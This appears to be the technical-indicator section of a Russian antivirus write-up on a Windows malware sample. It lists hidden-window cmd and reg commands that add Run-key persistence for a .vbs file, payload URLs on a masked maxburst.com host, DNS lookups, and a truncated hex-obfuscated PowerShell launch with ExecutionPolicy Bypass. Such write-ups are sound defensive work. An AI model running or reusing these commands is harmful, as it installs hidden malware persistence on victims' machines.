Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\<Имя файла>.vbs'
- http://rc#######.maxdroplet1.maxburst.com/wp-content/plugins/second.jpg
- http://rc#######.maxdroplet1.maxburst.com/wp-content/plugins/first.jpg
- DNS ASK rc#######.maxdroplet1.maxburst.com
- DNS ASK google.com
- '<SYSTEM32>\cmd.exe' /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "" /t REG_SZ /F /D "%APPDATA%\<Имя файла>.vbs"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "<SYSTEM32>\<Имя файла>.vbs" "%APPDATA%" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $bkNydwrVTCeTqsaabGcR='D4#C7#72#72#02#E6#96#F6#A6#D2#02#37#27#16#86#34#96#96#36#37#16#42#02#D3#76#E6#96#27#47#35#96#96#36#37#16#42#B3#D7#22#F5#42#87#03#22#D5#56#47#97#26...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "" /t REG_SZ /F /D "%APPDATA%\<Имя файла>.vbs"
- '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "" /t REG_SZ /F /D "%APPDATA%\<Имя файла>.vbs"
- '<SYSTEM32>\cmd.exe' /c copy "<SYSTEM32>\<Имя файла>.vbs" "%APPDATA%" /Y
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $bkNydwrVTCeTqsaabGcR='D4#C7#72#72#02#E6#96#F6#A6#D2#02#37#27#16#86#34#96#96#36#37#16#42#02#D3#76#E6#96#27#47#35#96#96#36#37#16#42#B3#D7#22#F5#42#87#03#22#D5#56#47#97#26...
- '%WINDIR%\syswow64\calc.exe'